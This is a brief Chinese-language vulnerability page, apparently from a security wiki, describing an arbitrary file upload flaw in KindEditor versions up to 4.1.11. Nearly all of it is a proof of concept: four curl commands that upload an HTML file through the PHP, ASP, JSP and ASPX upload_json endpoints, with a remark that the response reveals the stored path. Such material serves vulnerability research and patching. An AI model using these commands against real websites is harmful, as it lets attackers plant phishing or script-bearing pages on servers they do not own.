跳转至

kindeditor上传漏洞

漏洞影响

kindeditor <= 4.1.11

漏洞POC

curl -F"imgFile=@a.html" http://127.0.0.1/kindeditor/php/upload_json.php?dir=file
curl -F"imgFile=@a.html" http://127.0.0.1/kindeditor/asp/upload_json.asp?dir=file
curl -F"imgFile=@a.html" http://127.0.0.1/kindeditor/jsp/upload_json.jsp?dir=file
curl -F"imgFile=@a.html" http://127.0.0.1/kindeditor/aspx/upload_json.aspx?dir=file 
​```返回值为路径